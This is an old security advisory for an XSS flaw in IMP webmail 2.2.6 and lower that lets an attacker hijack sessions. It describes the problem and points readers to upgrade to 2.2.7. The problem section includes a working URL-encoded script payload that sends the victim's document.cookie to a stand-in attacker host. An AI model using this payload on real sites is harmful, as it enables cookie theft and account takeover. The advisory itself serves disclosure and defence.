COMMAND

	IMP

SYSTEMS AFFECTED

	 IMP 2.2.6 and lower

	 Not vulnerable : 2.2.7, dev versions 2.3 and 3.0

PROBLEM

	João Pedro Gonçalves found that it\'s possible to hijack an IMP  webmail
	session using a cross-site script attack,  quite   similar  to  the  one
	explored by Marc Slemko in his \"Microsoft Passport to  Trouble\"  paper
	(http://alive.znep.com/~marcs/passport/)
	

	To exploit this vulnerability using a text message, the  attacker  sends
	an email with a url, where if the user clicks, is redirected to
	

	

	http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript

	%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co

	m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%

	20%27%3E%27)%3B%3C%2Fscript%3E%0A

	

	

	which in return redirects the user\'s browser to the attacker\'s  server
	where he hijacks the cookies that the browser used  in  the  context  of
	the webmail site, and the session therefore.

SOLUTION

	Upgrade to 2.2.7
	

	Packages can be found on :
	

	ftp://ftp.horde.org/pub/horde/

	ftp://ftp.horde.org/pub/imp/

	

	

	MD5 checksums:
	

	2433ed0e67739c41021b1a9397130a96  horde-1.2.7.tar.gz

	b5c683e1dc862fd185c9be0ce7188894  imp-2.2.7.tar.gz

	818199bc9a92cff07d109c4b43a22ffe  patch-horde-1.2.6-1.2.7.gz

	556ddcabc72048ae53f4cfb00680e6f5  patch-imp-2.2.6-2.2.7.gz